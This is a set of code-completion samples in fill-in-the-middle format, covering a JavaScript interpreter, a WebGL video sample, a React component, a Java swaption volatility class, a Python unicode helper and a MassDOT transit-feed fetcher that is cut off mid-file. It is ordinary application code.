<|file_name|>interpreter.js<|end_file_name|><|fim▁begin|>import * as Error from '../error'; import * as Ast from './ast'; import * as ScopeHandler from './scopeHandler'; import * as TypeSystem from './typeSystem'; const evaluateBlock = (scope, ast) => { return ast.map((expr) => { return evaluateExpression(scope, expr); }); }; const evaluateExpression = (scope, astExpr) => { let output; switch(astExpr.node) { case 'LETDEFINITION': output = handleLetDefinition(scope, astExpr); break; case 'FUNCTIONDEFINITION': output = handleFunctionDefinition(scope, astExpr); break; case 'BODY': output = handleBody(scope, astExpr); break; case 'VARIABLE': output = handleVariable(scope, astExpr); break; case 'LAMBDA': output = handleLambda(scope, astExpr); break; case 'IF': output = handleIf(scope, astExpr); break; case 'IFELSE': output = handleIfElse(scope, astExpr); break; case 'APPLICATION': output = handleApplicationExpression(scope, astExpr); break; case 'BOOLEAN': output = astExpr; break; case 'UNDEFINED': output = astExpr; break; case 'NUMBER': output = astExpr; break; case 'STRING': output = astExpr; break; case 'SYMBOL': output = astExpr; break; case 'NOTE': output = astExpr; break; case 'BEAT': output = astExpr; break; case 'LIST': output = handleList(scope, astExpr); break; case 'MAP': output = handleMap(scope, astExpr); break; case 'MAPPAIR': output = handleMapPair(scope, astExpr); break; default: throw Error.create( Error.types.invalidAST, `AST Expression not valid: ${astExpr.node}` ); } return output; }; const handleLetDefinition = (scope, define) => { const defName = define.name; const defValue = evaluateExpression(scope, define.expression); ScopeHandler.set(scope, defName, defValue); return defValue; }; const handleFunctionDefinition = (scope, funcDef) => { const name = funcDef.name; const argNames = funcDef.argNames; const argTypes = funcDef.argTypes; const body = funcDef.body; const func = Ast.Func(argNames, argTypes, body); ScopeHandler.set(scope, name, func); return func; }; const handleBody = (scope, body) => { evaluateBlock(scope, body.definitions); return evaluateBlock(scope, body.expressions); }; const handleVariable = (scope, variable) => { return ScopeHandler.get(scope, variable.name); }; const handleLambda = (scope, lambda) => { return Ast.Closure( lambda.argNames, lambda.argTypes, lambda.body, scope ); }; const handleIf = (scope, ifNode) => { const predicate = evaluateExpression(scope, ifNode.predicate); let value; if (predicate === true || predicate !== 0) { value = evaluateBlock(scope, ifNode.expression); } else { value = false; } return value; }; const handleIfElse = (scope, ifElse) => { const predicate = evaluateExpression(scope, ifElse.predicate); let value; if (predicate === true || predicate !== 0) { value = evaluateBlock(scope, ifElse.trueExpression); } else { value = evaluateBlock(scope, ifElse.falseExpression); } return value; }; const handleApplicationExpression = (scope, application) => { const target = evaluateExpression(scope, application.target); const applicationArgs = application.args; const evaluatedArgs = applicationArgs.map((arg) => { return evaluateExpression(scope, arg); }); return handleApplication(scope, target, evaluatedArgs); }; const handleApplication = (scope, application, evaluatedArgs) => { if (!TypeSystem.checkFunctionTypes(application, evaluatedArgs)) { throw Error.create( Error.types.type, `Invalid types in application` ); } let result; switch (application.node) { case 'FUNCTION': result = handleFunction( scope, application, evaluatedArgs ); break; 
case 'BUILTIN': result = handleBuiltIn( scope, application, evaluatedArgs ); break; case 'CLOSURE': result = handleFunction( application.scope, application, evaluatedArgs ); break; default: throw Error.create( Error.types.application, `Application node not valid: ${application.node}` ); } return result; }; const handleFunction = (scope, func, functionArgs) => { const functionArgNames = func.argNames; const functionBody = func.body; if (functionArgs.length !== functionArgNames.length) { throw Error.create( Error.types.application, 'Incorrect argument number' ); } let childScope = ScopeHandler.createChildScope(scope); for (let i = 0; i < functionArgNames.length; i += 1) { ScopeHandler.set(childScope, functionArgNames[i], functionArgs[i]); } return evaluateExpression(childScope, functionBody); }; const handleBuiltIn = (scope, builtIn, functionArgs) => { const func = builtIn.func; if (functionArgs.length !== func.length) { throw Error.create( Error.types.application, 'Incorrect argument number' ); } const childScope = ScopeHandler.createChildScope(scope); // function args have already been evaluated return func.apply(childScope, functionArgs); }; const handleList = (scope, list) => { return Ast.List( list.values.map((lExp) => { return evaluateExpression(scope, lExp); }) );<|fim▁hole|> return Ast.Map( map.entries.map((mExp) => { return evaluateExpression(scope, mExp); }) ); }; const handleMapPair = (scope, pair) => { return { k: evaluateExpression(scope, pair.key), v: evaluateExpression(scope, pair.value) }; }; // scope is a dictionary, stored in and passed in by the Core export const evaluate = (scope, ast) => { evaluateBlock(scope, ast); }; export const apply = (scope, closure, args) => { handleApplication(scope, closure, args); };<|fim▁end|>
}; const handleMap = (scope, map) => {
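// Illustrative sketch (editor's addition, not part of the record above): how
// the LIST handler recurses. Ast.List and evaluateExpression come from the
// interpreter above; the literal node shapes shown here are assumptions.
//
//   const expr = { node: 'LIST', values: [{ node: 'NUMBER', value: 1 }] };
//   handleList(scope, expr);
//   // => Ast.List([{ node: 'NUMBER', value: 1 }])  (each value evaluated;
//   //    NUMBER nodes evaluate to themselves)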
<|file_name|>video.ts<|end_file_name|><|fim▁begin|>/*{# Copyright (c) 2012 Turbulenz Limited #}*/ /* * @title: Video playback * @description: * This sample shows how to play a video into a texture. */ /*{{ javascript("jslib/observer.js") }}*/ /*{{ javascript("jslib/requesthandler.js") }}*/ /*{{ javascript("jslib/utilities.js") }}*/ /*{{ javascript("jslib/services/turbulenzservices.js") }}*/ /*{{ javascript("jslib/services/turbulenzbridge.js") }}*/ /*{{ javascript("jslib/services/gamesession.js") }}*/ /*{{ javascript("jslib/services/mappingtable.js") }}*/ /*global TurbulenzEngine: true */ /*global TurbulenzServices: false */ /*global RequestHandler: false */ TurbulenzEngine.onload = function onloadFn() { var graphicsDevice = TurbulenzEngine.createGraphicsDevice({}); // IE detection while WebGL implementation is incomplete if (graphicsDevice && graphicsDevice.renderer === "Internet Explorer") { window.alert("The video sample is not supported on Internet Explorer"); return; } var soundDevice = TurbulenzEngine.createSoundDevice({}); var mathDevice = TurbulenzEngine.createMathDevice({}); var requestHandler = RequestHandler.create({}); var video; var videoPosition = -1; var shader, technique; var texture; var clearColor = mathDevice.v4Build(0, 0, 0, 1); var clipSpace = mathDevice.v4Build(1, -1, 0, 0); var videoColor = mathDevice.v4Build(1, 1, 1, 1); var primitive = graphicsDevice.PRIMITIVE_TRIANGLE_STRIP; var semantics = graphicsDevice.createSemantics(['POSITION', 'TEXCOORD0']); var vertexBuffer = graphicsDevice.createVertexBuffer({ numVertices: 4, attributes: [graphicsDevice.VERTEXFORMAT_FLOAT2, graphicsDevice.VERTEXFORMAT_FLOAT2], dynamic: false, data: [ -1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0, -1.0, 0.0, 0.0, 1.0, -1.0, 1.0, 0.0 ] }); var source = soundDevice.createGlobalSource({ looping: true }); var sound; var assetsToLoad = 3; function mappingTableReceived(mappingTable) { var videoURL; if (graphicsDevice.isSupported("FILEFORMAT_WEBM")) { videoURL = mappingTable.getURL("videos/turbulenzanimation.webm"); } else { videoURL = mappingTable.getURL("videos/turbulenzanimation.mp4"); } graphicsDevice.createVideo({ src: videoURL, looping: true, onload: function (v) { if (v) { video = v; assetsToLoad -= 1; } else { window.alert("Failed to load video!"); } } }); var soundURL; if (soundDevice.isSupported("FILEFORMAT_OGG")) { soundURL = mappingTable.getURL("sounds/turbulenzanimation.ogg"); } else { soundURL = mappingTable.getURL("sounds/turbulenzanimation.mp3"); } soundDevice.createSound({ src: soundURL, onload : function (s) { if (s) { sound = s; assetsToLoad -= 1; } else { window.alert('Failed to load sound!'); } } }); function shaderLoaded(shaderText) { if (shaderText) { var shaderParameters = JSON.parse(shaderText); shader = graphicsDevice.createShader(shaderParameters); technique = shader.getTechnique("video"); assetsToLoad -= 1; } else { window.alert("Failed to load shader!"); } } requestHandler.request({ src: mappingTable.getURL("shaders/video.cgfx"), onload: shaderLoaded }); } var gameSession; function sessionCreated() { TurbulenzServices.createMappingTable( requestHandler, gameSession, mappingTableReceived ); } gameSession = TurbulenzServices.createGameSession(requestHandler, sessionCreated); //========================================================================== // Main loop. 
//========================================================================== var fpsElement = document.getElementById("fpscounter"); var lastFPS = ""; var nextUpdate = 0; function displayPerformance() { var currentTime = TurbulenzEngine.time; if (currentTime > nextUpdate) { nextUpdate = (currentTime + 0.1); var fpsText = (graphicsDevice.fps).toFixed(2); if (lastFPS !== fpsText) { lastFPS = fpsText; fpsElement.innerHTML = fpsText + " fps"; } } } function mainLoop() { soundDevice.update(); if (graphicsDevice.beginFrame()) { var deviceWidth = graphicsDevice.width; var deviceHeight = graphicsDevice.height; var aspectRatio = (deviceWidth / deviceHeight); var videoWidth = video.width; var videoHeight = video.height; var videoAspectRatio = (videoWidth / videoHeight); <|fim▁hole|> y = aspectRatio / videoAspectRatio; } else //if (aspectRatio >= videoAspectRatio) { x = videoAspectRatio / aspectRatio; y = 1; } var currentVideoPosition = video.tell; if (currentVideoPosition && videoPosition !== currentVideoPosition) { if (currentVideoPosition < videoPosition) { // looped, sync source.seek(videoPosition); } videoPosition = currentVideoPosition; texture.setData(video); } graphicsDevice.clear(clearColor); graphicsDevice.setTechnique(technique); technique.texture = texture; technique.clipSpace = mathDevice.v4Build(x, -y, 0, 0, clipSpace); technique.color = videoColor; graphicsDevice.setStream(vertexBuffer, semantics); graphicsDevice.draw(primitive, 4); graphicsDevice.endFrame(); if (fpsElement) { displayPerformance(); } } } var intervalID; function loadingLoop() { if (assetsToLoad === 0) { TurbulenzEngine.clearInterval(intervalID); source.play(sound); video.play(); texture = graphicsDevice.createTexture({ width: video.width, height: video.height, mipmaps: false, format: 'R8G8B8', dynamic: true, data: video }); videoPosition = video.tell; intervalID = TurbulenzEngine.setInterval(mainLoop, 1000 / 60); } } intervalID = TurbulenzEngine.setInterval(loadingLoop, 100); // Create a scene destroy callback to run when the window is closed TurbulenzEngine.onunload = function destroyScene() { TurbulenzEngine.clearInterval(intervalID); if (texture) { texture.destroy(); texture = null; } if (shader) { shader.destroy(); technique = null; shader = null; } if (video) { video.destroy(); video = null; } if (vertexBuffer) { vertexBuffer.destroy(); vertexBuffer = null; } if (source) { source.destroy(); source = null; } if (sound) { sound.destroy(); sound = null; } fpsElement = null; if (gameSession) { gameSession.destroy(); gameSession = null; } }; };<|fim▁end|>
var x, y; if (aspectRatio < videoAspectRatio) { x = 1;
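// Editor's note (not part of the record above): the completed branch performs
// letterboxing -- when the screen is narrower than the video
// (aspectRatio < videoAspectRatio) the quad keeps full width (x = 1) and is
// scaled down vertically (y = aspectRatio / videoAspectRatio); the else
// branch pillarboxes instead with x = videoAspectRatio / aspectRatio, y = 1.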
<|file_name|>wsgi.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2 # -*- coding: utf-8 -*-<|fim▁hole|>from dr import app if __name__ == '__main__': app.run()<|fim▁end|>
<|file_name|>UserListModalEntry.tsx<|end_file_name|><|fim▁begin|>import * as React from "react"; import FollowButton from "../FollowButton"; import SimilarityScore from "../SimilarityScore"; import { SimilarUsersModalProps } from "./SimilarUsersModal"; export type UserListModalEntryProps = { mode: "follow-following" | "similar-users"; user: ListenBrainzUser | SimilarUser; loggedInUser: ListenBrainzUser | null; apiUrl: string; loggedInUserFollowsUser: boolean; updateFollowingList: (<|fim▁hole|> action: "follow" | "unfollow" ) => void; }; const UserListModalEntry = (props: UserListModalEntryProps) => { const { mode, user, loggedInUserFollowsUser, loggedInUser, updateFollowingList, apiUrl, } = props; return ( <> <div key={user.name}> <div> <a href={`/user/${user.name}`} target="_blank" rel="noopener noreferrer" > {user.name} </a> {loggedInUser && mode === "similar-users" && ( <SimilarityScore similarityScore={(user as SimilarUser).similarityScore} user={user} type="compact" /> )} </div> {loggedInUser && ( <FollowButton type="block" user={user} apiUrl={apiUrl} loggedInUser={loggedInUser} loggedInUserFollowsUser={loggedInUserFollowsUser} updateFollowingList={updateFollowingList} /> )} </div> </> ); }; export default UserListModalEntry;<|fim▁end|>
user: ListenBrainzUser,
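// Illustrative sketch (editor's addition, not part of the record above): a
// plausible shape for the updateFollowingList prop whose parameter the
// completion above fills in -- hypothetical body, only the signature comes
// from the record.
//
//   const updateFollowingList = (
//     user: ListenBrainzUser,
//     action: "follow" | "unfollow"
//   ) => {
//     // add or remove `user` from the locally cached following list
//   };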
<|file_name|>NormalSwaptionExpiryStrikeVolatilities.java<|end_file_name|><|fim▁begin|>/* * Copyright (C) 2015 - present by OpenGamma Inc. and the OpenGamma group of companies * * Please see distribution for license. */ package com.opengamma.strata.pricer.swaption; import java.io.Serializable; import java.time.LocalDate; import java.time.ZonedDateTime; import java.util.Map; import java.util.NoSuchElementException; import java.util.Optional; import java.util.OptionalInt; import org.joda.beans.Bean; import org.joda.beans.BeanBuilder; import org.joda.beans.ImmutableBean; import org.joda.beans.JodaBeanUtils; import org.joda.beans.MetaBean; import org.joda.beans.MetaProperty; import org.joda.beans.gen.BeanDefinition; import org.joda.beans.gen.ImmutableConstructor; import org.joda.beans.gen.PropertyDefinition; import org.joda.beans.impl.direct.DirectMetaBean; import org.joda.beans.impl.direct.DirectMetaProperty; import org.joda.beans.impl.direct.DirectMetaPropertyMap; import org.joda.beans.impl.direct.DirectPrivateBeanBuilder; import com.opengamma.strata.basics.date.DayCount; import com.opengamma.strata.collect.ArgChecker; import com.opengamma.strata.data.MarketDataName; import com.opengamma.strata.market.ValueType; import com.opengamma.strata.market.param.CurrencyParameterSensitivities; import com.opengamma.strata.market.param.CurrencyParameterSensitivity; import com.opengamma.strata.market.param.ParameterMetadata; import com.opengamma.strata.market.param.ParameterPerturbation; import com.opengamma.strata.market.param.UnitParameterSensitivity; import com.opengamma.strata.market.sensitivity.PointSensitivities; import com.opengamma.strata.market.sensitivity.PointSensitivity; import com.opengamma.strata.market.surface.InterpolatedNodalSurface; import com.opengamma.strata.market.surface.Surface; import com.opengamma.strata.market.surface.SurfaceInfoType; import com.opengamma.strata.market.surface.Surfaces; import com.opengamma.strata.pricer.impl.option.NormalFormulaRepository; import com.opengamma.strata.product.common.PutCall; import com.opengamma.strata.product.swap.type.FixedFloatSwapConvention; import com.opengamma.strata.product.swap.type.FixedIborSwapConvention; /** * Volatility for swaptions in the normal or Bachelier model based on a surface. * <p> * The volatility is represented by a surface on the expiry and strike dimensions. */ @BeanDefinition(builderScope = "private") public final class NormalSwaptionExpiryStrikeVolatilities implements NormalSwaptionVolatilities, ImmutableBean, Serializable { /** * The swap convention that the volatilities are to be used for. */ @PropertyDefinition(validate = "notNull", overrideGet = true) private final FixedFloatSwapConvention convention; /** * The valuation date-time. * <p> * The volatilities are calibrated for this date-time. */ @PropertyDefinition(validate = "notNull", overrideGet = true) private final ZonedDateTime valuationDateTime; /** * The normal volatility surface. * <p> * The x-value of the surface is the expiry, as a year fraction. * The y-value of the surface is the strike, as a rate. */ @PropertyDefinition(validate = "notNull") private final Surface surface; /** * The day count convention of the surface. */ private final transient DayCount dayCount; // cached, not a property //------------------------------------------------------------------------- /** * Obtains an instance from the implied volatility surface and the date-time for which it is valid. 
* <p> * The surface is specified by an instance of {@link Surface}, such as {@link InterpolatedNodalSurface}. * The surface must contain the correct metadata: * <ul> * <li>The x-value type must be {@link ValueType#YEAR_FRACTION} * <li>The y-value type must be {@link ValueType#STRIKE} * <li>The z-value type must be {@link ValueType#NORMAL_VOLATILITY} * <li>The day count must be set in the additional information using {@link SurfaceInfoType#DAY_COUNT} * </ul> * Suitable surface metadata can be created using * {@link Surfaces#normalVolatilityByExpiryStrike(String, DayCount)}. * * @param convention the swap convention that the volatilities are to be used for * @param valuationDateTime the valuation date-time * @param surface the implied volatility surface * @return the volatilities */ public static NormalSwaptionExpiryStrikeVolatilities of( FixedFloatSwapConvention convention, ZonedDateTime valuationDateTime, Surface surface) { return new NormalSwaptionExpiryStrikeVolatilities(convention, valuationDateTime, surface); } @ImmutableConstructor private NormalSwaptionExpiryStrikeVolatilities( FixedFloatSwapConvention convention, ZonedDateTime valuationDateTime, Surface surface) { ArgChecker.notNull(convention, "convention"); ArgChecker.notNull(valuationDateTime, "valuationDateTime"); ArgChecker.notNull(surface, "surface"); surface.getMetadata().getXValueType().checkEquals( ValueType.YEAR_FRACTION, "Incorrect x-value type for Normal volatilities"); surface.getMetadata().getYValueType().checkEquals( ValueType.STRIKE, "Incorrect y-value type for Normal volatilities"); surface.getMetadata().getZValueType().checkEquals( ValueType.NORMAL_VOLATILITY, "Incorrect z-value type for Normal volatilities"); DayCount dayCount = surface.getMetadata().findInfo(SurfaceInfoType.DAY_COUNT) .orElseThrow(() -> new IllegalArgumentException("Incorrect surface metadata, missing DayCount")); this.valuationDateTime = valuationDateTime; this.surface = surface; this.convention = convention; this.dayCount = dayCount; } // ensure standard constructor is invoked private Object readResolve() { return new NormalSwaptionExpiryStrikeVolatilities(convention, valuationDateTime, surface); } //------------------------------------------------------------------------- @Override public SwaptionVolatilitiesName getName() { return SwaptionVolatilitiesName.of(surface.getName().getName()); } @Override public <T> Optional<T> findData(MarketDataName<T> name) { if (surface.getName().equals(name)) { return Optional.of(name.getMarketDataType().cast(surface)); } return Optional.empty(); } @Override public int getParameterCount() { return surface.getParameterCount(); } @Override public double getParameter(int parameterIndex) { return surface.getParameter(parameterIndex); } @Override public ParameterMetadata getParameterMetadata(int parameterIndex) { return surface.getParameterMetadata(parameterIndex); } @Override public OptionalInt findParameterIndex(ParameterMetadata metadata) { return surface.findParameterIndex(metadata); } @Override public NormalSwaptionExpiryStrikeVolatilities withParameter(int parameterIndex, double newValue) { return new NormalSwaptionExpiryStrikeVolatilities( convention, valuationDateTime, surface.withParameter(parameterIndex, newValue)); } @Override public NormalSwaptionExpiryStrikeVolatilities withPerturbation(ParameterPerturbation perturbation) { return new NormalSwaptionExpiryStrikeVolatilities( convention, valuationDateTime, surface.withPerturbation(perturbation)); } 
  //-------------------------------------------------------------------------
  @Override
  public double volatility(double expiry, double tenor, double strike, double forwardRate) {
    return surface.zValue(expiry, strike);
  }

  @Override
  public CurrencyParameterSensitivities parameterSensitivity(PointSensitivities pointSensitivities) {
    CurrencyParameterSensitivities sens = CurrencyParameterSensitivities.empty();
    for (PointSensitivity point : pointSensitivities.getSensitivities()) {
      if (point instanceof SwaptionSensitivity) {
        SwaptionSensitivity pt = (SwaptionSensitivity) point;
        if (pt.getVolatilitiesName().equals(getName())) {
          sens = sens.combinedWith(parameterSensitivity(pt));
        }
      }
    }
    return sens;
  }

  private CurrencyParameterSensitivity parameterSensitivity(SwaptionSensitivity point) {
    double expiry = point.getExpiry();
    double strike = point.getStrike();
    UnitParameterSensitivity unitSens = surface.zValueParameterSensitivity(expiry, strike);
    return unitSens.multipliedBy(point.getCurrency(), point.getSensitivity());
  }

  //-------------------------------------------------------------------------
  @Override
  public double price(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) {
    return NormalFormulaRepository.price(forward, strike, expiry, volatility, putCall);
  }

  @Override
  public double priceDelta(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) {
    return NormalFormulaRepository.delta(forward, strike, expiry, volatility, putCall);
  }

  @Override
  public double priceGamma(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) {
    return NormalFormulaRepository.gamma(forward, strike, expiry, volatility, putCall);
  }

  @Override
  public double priceTheta(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) {
    return NormalFormulaRepository.theta(forward, strike, expiry, volatility, putCall);
  }

  @Override
  public double priceVega(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) {
    return NormalFormulaRepository.vega(forward, strike, expiry, volatility, putCall);
  }

  //-------------------------------------------------------------------------
  @Override
  public double relativeTime(ZonedDateTime dateTime) {
    ArgChecker.notNull(dateTime, "dateTime");
    LocalDate valuationDate = valuationDateTime.toLocalDate();
    LocalDate date = dateTime.toLocalDate();
    return dayCount.relativeYearFraction(valuationDate, date);
  }

  @Override
  public double tenor(LocalDate startDate, LocalDate endDate) {
    // rounded number of months; the rounding ensures an integer number of years even with holidays/leap years
    return Math.round((endDate.toEpochDay() - startDate.toEpochDay()) / 365.25 * 12) / 12d;
  }

  //------------------------- AUTOGENERATED START -------------------------
  /**
   * The meta-bean for {@code NormalSwaptionExpiryStrikeVolatilities}.
   * @return the meta-bean, not null
   */
  public static NormalSwaptionExpiryStrikeVolatilities.Meta meta() {
    return NormalSwaptionExpiryStrikeVolatilities.Meta.INSTANCE;
  }

  static {
    MetaBean.register(NormalSwaptionExpiryStrikeVolatilities.Meta.INSTANCE);
  }

  /**
   * The serialization version id.
*/ private static final long serialVersionUID = 1L; @Override public NormalSwaptionExpiryStrikeVolatilities.Meta metaBean() { return NormalSwaptionExpiryStrikeVolatilities.Meta.INSTANCE; } //----------------------------------------------------------------------- /** * Gets the swap convention that the volatilities are to be used for. * @return the value of the property, not null */ @Override public FixedFloatSwapConvention getConvention() { return convention; } //----------------------------------------------------------------------- /** * Gets the valuation date-time. * <p> * The volatilities are calibrated for this date-time. * @return the value of the property, not null */ @Override public ZonedDateTime getValuationDateTime() { return valuationDateTime; } //----------------------------------------------------------------------- /** * Gets the normal volatility surface. * <p> * The x-value of the surface is the expiry, as a year fraction. * The y-value of the surface is the strike, as a rate. * @return the value of the property, not null */ public Surface getSurface() { return surface; } <|fim▁hole|> if (obj == this) { return true; } if (obj != null && obj.getClass() == this.getClass()) { NormalSwaptionExpiryStrikeVolatilities other = (NormalSwaptionExpiryStrikeVolatilities) obj; return JodaBeanUtils.equal(convention, other.convention) && JodaBeanUtils.equal(valuationDateTime, other.valuationDateTime) && JodaBeanUtils.equal(surface, other.surface); } return false; } @Override public int hashCode() { int hash = getClass().hashCode(); hash = hash * 31 + JodaBeanUtils.hashCode(convention); hash = hash * 31 + JodaBeanUtils.hashCode(valuationDateTime); hash = hash * 31 + JodaBeanUtils.hashCode(surface); return hash; } @Override public String toString() { StringBuilder buf = new StringBuilder(128); buf.append("NormalSwaptionExpiryStrikeVolatilities{"); buf.append("convention").append('=').append(JodaBeanUtils.toString(convention)).append(',').append(' '); buf.append("valuationDateTime").append('=').append(JodaBeanUtils.toString(valuationDateTime)).append(',').append(' '); buf.append("surface").append('=').append(JodaBeanUtils.toString(surface)); buf.append('}'); return buf.toString(); } //----------------------------------------------------------------------- /** * The meta-bean for {@code NormalSwaptionExpiryStrikeVolatilities}. */ public static final class Meta extends DirectMetaBean { /** * The singleton instance of the meta-bean. */ static final Meta INSTANCE = new Meta(); /** * The meta-property for the {@code convention} property. */ private final MetaProperty<FixedFloatSwapConvention> convention = DirectMetaProperty.ofImmutable( this, "convention", NormalSwaptionExpiryStrikeVolatilities.class, FixedFloatSwapConvention.class); /** * The meta-property for the {@code valuationDateTime} property. */ private final MetaProperty<ZonedDateTime> valuationDateTime = DirectMetaProperty.ofImmutable( this, "valuationDateTime", NormalSwaptionExpiryStrikeVolatilities.class, ZonedDateTime.class); /** * The meta-property for the {@code surface} property. */ private final MetaProperty<Surface> surface = DirectMetaProperty.ofImmutable( this, "surface", NormalSwaptionExpiryStrikeVolatilities.class, Surface.class); /** * The meta-properties. */ private final Map<String, MetaProperty<?>> metaPropertyMap$ = new DirectMetaPropertyMap( this, null, "convention", "valuationDateTime", "surface"); /** * Restricted constructor. 
*/ private Meta() { } @Override protected MetaProperty<?> metaPropertyGet(String propertyName) { switch (propertyName.hashCode()) { case 2039569265: // convention return convention; case -949589828: // valuationDateTime return valuationDateTime; case -1853231955: // surface return surface; } return super.metaPropertyGet(propertyName); } @Override public BeanBuilder<? extends NormalSwaptionExpiryStrikeVolatilities> builder() { return new NormalSwaptionExpiryStrikeVolatilities.Builder(); } @Override public Class<? extends NormalSwaptionExpiryStrikeVolatilities> beanType() { return NormalSwaptionExpiryStrikeVolatilities.class; } @Override public Map<String, MetaProperty<?>> metaPropertyMap() { return metaPropertyMap$; } //----------------------------------------------------------------------- /** * The meta-property for the {@code convention} property. * @return the meta-property, not null */ public MetaProperty<FixedFloatSwapConvention> convention() { return convention; } /** * The meta-property for the {@code valuationDateTime} property. * @return the meta-property, not null */ public MetaProperty<ZonedDateTime> valuationDateTime() { return valuationDateTime; } /** * The meta-property for the {@code surface} property. * @return the meta-property, not null */ public MetaProperty<Surface> surface() { return surface; } //----------------------------------------------------------------------- @Override protected Object propertyGet(Bean bean, String propertyName, boolean quiet) { switch (propertyName.hashCode()) { case 2039569265: // convention return ((NormalSwaptionExpiryStrikeVolatilities) bean).getConvention(); case -949589828: // valuationDateTime return ((NormalSwaptionExpiryStrikeVolatilities) bean).getValuationDateTime(); case -1853231955: // surface return ((NormalSwaptionExpiryStrikeVolatilities) bean).getSurface(); } return super.propertyGet(bean, propertyName, quiet); } @Override protected void propertySet(Bean bean, String propertyName, Object newValue, boolean quiet) { metaProperty(propertyName); if (quiet) { return; } throw new UnsupportedOperationException("Property cannot be written: " + propertyName); } } //----------------------------------------------------------------------- /** * The bean-builder for {@code NormalSwaptionExpiryStrikeVolatilities}. */ private static final class Builder extends DirectPrivateBeanBuilder<NormalSwaptionExpiryStrikeVolatilities> { private FixedFloatSwapConvention convention; private ZonedDateTime valuationDateTime; private Surface surface; /** * Restricted constructor. 
*/ private Builder() { } //----------------------------------------------------------------------- @Override public Object get(String propertyName) { switch (propertyName.hashCode()) { case 2039569265: // convention return convention; case -949589828: // valuationDateTime return valuationDateTime; case -1853231955: // surface return surface; default: throw new NoSuchElementException("Unknown property: " + propertyName); } } @Override public Builder set(String propertyName, Object newValue) { switch (propertyName.hashCode()) { case 2039569265: // convention this.convention = (FixedFloatSwapConvention) newValue; break; case -949589828: // valuationDateTime this.valuationDateTime = (ZonedDateTime) newValue; break; case -1853231955: // surface this.surface = (Surface) newValue; break; default: throw new NoSuchElementException("Unknown property: " + propertyName); } return this; } @Override public NormalSwaptionExpiryStrikeVolatilities build() { return new NormalSwaptionExpiryStrikeVolatilities( convention, valuationDateTime, surface); } //----------------------------------------------------------------------- @Override public String toString() { StringBuilder buf = new StringBuilder(128); buf.append("NormalSwaptionExpiryStrikeVolatilities.Builder{"); buf.append("convention").append('=').append(JodaBeanUtils.toString(convention)).append(',').append(' '); buf.append("valuationDateTime").append('=').append(JodaBeanUtils.toString(valuationDateTime)).append(',').append(' '); buf.append("surface").append('=').append(JodaBeanUtils.toString(surface)); buf.append('}'); return buf.toString(); } } //-------------------------- AUTOGENERATED END -------------------------- }<|fim▁end|>
//----------------------------------------------------------------------- @Override public boolean equals(Object obj) {
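// Editor's note (not part of the record above): the completed equals() is the
// start of the Joda-Beans AUTOGENERATED block -- it compares the three
// immutable properties via JodaBeanUtils.equal(), mirroring the 31-multiplier
// hashCode() that the prompt section already contains.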
<|file_name|>encoding.py<|end_file_name|><|fim▁begin|>import datetime from decimal import Decimal import types import six def is_protected_type(obj): """Determine if the object instance is of a protected type. Objects of protected types are preserved as-is when passed to force_unicode(strings_only=True). """ return isinstance(obj, ( six.integer_types + (types.NoneType, datetime.datetime, datetime.date, datetime.time, float, Decimal)) ) def force_unicode(s, encoding='utf-8', strings_only=False, errors='strict'): """ Similar to smart_text, except that lazy instances are resolved to strings, rather than kept as lazy objects. If strings_only is True, don't convert (some) non-string-like objects. """ # Handle the common case first, saves 30-40% when s is an instance of # six.text_type. This function gets called often in that setting. if isinstance(s, six.text_type):<|fim▁hole|> return s if strings_only and is_protected_type(s): return s try: if not isinstance(s, six.string_types): if hasattr(s, '__unicode__'): s = s.__unicode__() else: if six.PY3: if isinstance(s, bytes): s = six.text_type(s, encoding, errors) else: s = six.text_type(s) else: s = six.text_type(bytes(s), encoding, errors) else: # Note: We use .decode() here, instead of six.text_type(s, # encoding, errors), so that if s is a SafeBytes, it ends up being # a SafeText at the end. s = s.decode(encoding, errors) except UnicodeDecodeError as e: if not isinstance(s, Exception): raise UnicodeDecodeError(*e.args) else: # If we get to here, the caller has passed in an Exception # subclass populated with non-ASCII bytestring data without a # working unicode method. Try to handle this without raising a # further exception by individually forcing the exception args # to unicode. s = ' '.join([force_unicode(arg, encoding, strings_only, errors) for arg in s]) return s<|fim▁end|>
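# Illustrative sketch (editor's addition, not part of the record above): how
# is_protected_type() drives the strings_only short-circuit in force_unicode.
#
#   force_unicode(42, strings_only=True)   # -> 42, untouched (int is protected)
#   force_unicode(42)                      # -> u'42'
#   force_unicode(b'caf\xc3\xa9')          # -> u'café', decoded as UTF-8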
<|file_name|>Massdot.py<|end_file_name|><|fim▁begin|>"""Fetch Massachusetts Department of Transportation feeds. MassDOT supplies the feeds for MA not covered by MBTA (Boston's transit authority). http://www.massdot.state.ma.us/DevelopersData.aspx """ import logging from FeedSource import FeedSource BASE_URL = 'http://www.massdot.state.ma.us/Portals/0/docs/developers/' LOG = logging.getLogger(__name__) class Massdot(FeedSource): """Fetch MassDOT (MA, non-Boston) feeds.""" def __init__(self): super(Massdot, self).__init__() berkshire_url = '%sbrta_google_transit.zip' % BASE_URL brockton_url = '%sbat_google_transit.zip' % BASE_URL cape_ann_url = '%scata_google_transit.zip' % BASE_URL cape_cod_url = '%sccrta_google_transit.zip' % BASE_URL franklin_url = '%sfrta_google_transit.zip' % BASE_URL attleboro_url = '%sgatra_google_transit.zip' % BASE_URL lowell_url = '%slrta_google_transit.zip' % BASE_URL merrimack_url = '%smvrta_google_transit.zip' % BASE_URL metrowest_url = '%smwrta_google_transit.zip' % BASE_URL montachusett_url = '%smart_google_transit.zip' % BASE_URL nantucket_url = '%snrta_google_transit.zip' % BASE_URL pioneer_valley_url = 'http://www.pvta.com/g_trans/google_transit.zip' southeastern_url = '%ssrta_google_transit.zip' % BASE_URL vineyard_url = '%svta_google_transit.zip' % BASE_URL worchester_url = '%swrta_google_transit.zip' % BASE_URL ma_ferry_url = '%sferries_google_transit.zip' % BASE_URL # private bus services; these feeds tend to have validation issues bloom_url = '%sBloom_google_transit.zip' % BASE_URL boston_express_url = '%sboston_express_google_transit.zip' % BASE_URL coach_bus_url = '%scoach_google_transit.zip' % BASE_URL dattco_url = '%sdattco_google_transit.zip' % BASE_URL<|fim▁hole|> self.urls = { 'berkshire.zip': berkshire_url, 'brockton.zip': brockton_url, 'cape_ann.zip': 